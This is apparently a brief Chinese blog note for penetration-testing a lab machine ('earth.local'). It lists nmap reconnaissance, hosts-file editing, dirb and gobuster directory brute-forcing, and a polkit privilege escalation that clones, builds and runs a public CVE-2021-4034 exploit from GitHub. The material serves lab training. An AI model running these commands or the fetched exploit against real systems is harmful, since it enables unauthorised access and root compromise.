渗透测试
Last updated on 6 months ago
note
信息收集
ip信息
- ifconfig (查看攻击机ip)192.168.22.129
- nmap -sP 192.168.22.129/24 寻找靶机ip(192.168.1.2)
- nmap -A 192.168.1.2 查找靶机开放的端口,DNS服务,版本信息
分析
- 看端口是否有22,80,443,8080,8080端口可以直接192.168.1.2:8080可以直接在页面访问
- 有DNS服务,如果有的话
- vim /etc/hosts
- 按i进行输入 192.168.22.132 DNS域名地址
- esc :wq
- 看系统版本信息
- polkit提权 CVE-2021-4034
- git clone https://github.com/berdav/CVE-2021-4034
- cd CVE-2021-4034
- make
- ./cve-2021-4034
网页信息
- dirb
- dirb http://earth.local
- dirb http://192.168.2.1:8080
- gobuster
- gobuster dir -u https://earth.local -u https://terratest.earth.local -k -w /root/桌面/gobuster/SecLists/Discovery/Web-Content/common.txt
- 报错提示 192.168.1.1:8080/dscvhjc 随便输点,看页面报错信息
渗透测试
https://blog.yblue.top/2023/08/20/渗透测试/